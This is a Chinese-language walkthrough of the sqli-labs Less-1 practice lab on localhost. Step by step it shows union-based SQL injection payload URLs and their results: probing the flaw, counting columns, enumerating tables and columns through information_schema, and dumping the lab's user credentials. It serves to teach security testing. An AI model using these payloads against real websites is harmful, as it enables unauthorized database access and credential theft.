http://localhost/sqli-labs/Less-1/
HackBar
MySQL
Apache
首先我们假装不知道后台的代码。其中sql查询语句为sql=“SELECT * FROM users WHERE id=’$id’ LIMIT 0,1”;
payload:
http://localhost/sqli-labs/Less-1/?id=1 --+
mysql:
SELECT * FROM users WHERE id='1' LIMIT 0,1
result:
Your Login name:Dumb
Your Password:Dumb
payload:
http://localhost/sqli-labs/Less-1/?id=1' --+
result:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
payload:
http://localhost/sqli-labs/Less-1/?id=1‘ and 1=1 --+
result:
Your Login name:Dumb
Your Password:Dumb
payload:
http://localhost/sqli-labs/Less-1/?id=1' and 1=2 --+
result:
none!
结论:所以该网站可能存在sql注入漏洞,接下里用order by 1-99语句查询该数据表的字段数量。
payload:
http://localhost/sqli-labs/Less-1/?id=1' order by 2 --+
result:
Your Login name:Dumb
Your Password:Dumb
payload:
http://localhost/sqli-labs/Less-1/?id=1' order by 3 --+
result:
Your Login name:Dumb
Your Password:Dumb
payload:
http://localhost/sqli-labs/Less-1/?id=1' order by 4 --+
result:
Unknown column '4' in 'order clause'
结论:所以字段数为3。
payload:
http://localhost/sqli-labs/Less-1/?id=1' union select 1,2,3--+
result:
Your Login name:Dumb
Your Password:Dumb
这里成功执行,但没有返回union select的结果,这是由于代码只返回第一条结果,所以union select获取的结果没有输出到页面。于是设置id=-1,这样可以显示后者的结果。
payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,3--+
result:
Your Login name:2
Your Password:3
返回的结果为2,3,意味着union select 1,2,3中,2和3的位置可以输入MySQL语句,于是我们尝试在3的位置查询当前数据库名(database()函数)
payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,database()--+
result:
Your Login name:2
Your Password:security
数据库名:security
接下来,来说获取表名
payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select table_name from information_schema.tables where table_schema='security' limit 0,1) --+
result:
Your Login name:2
Your Password:emails
这里可以修改limit 0,1。改为group_concat函数可以获得所有表名。
payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+
result:
Your Login name:2
Your Password:emails,referers,uagents,users
这里以users为例,下一步是获取字段名。
payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1) --+
result:
Your Login name:2
Your Password:id
这里可以修改limit 0,1。改为group_concat函数可以获得所有字段名。
payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' ) --+
result:
Your Login name:2
Your Password:id,username,password
最后爆出用户名和密码
payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(concat(username,':',password)) from security.users ) --+
result:
Your Login name:2
Your Password:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4
结论如下:
Dumb Dumb
Angelina I-kill-you
Dummy p@ssword
secure crappy
stupid stupidity
superman genious
batman mob!le
admin admin
admin1 admin1
admin2 admin2
admin3 admin3
dhakkan dumbo
admin4 admin4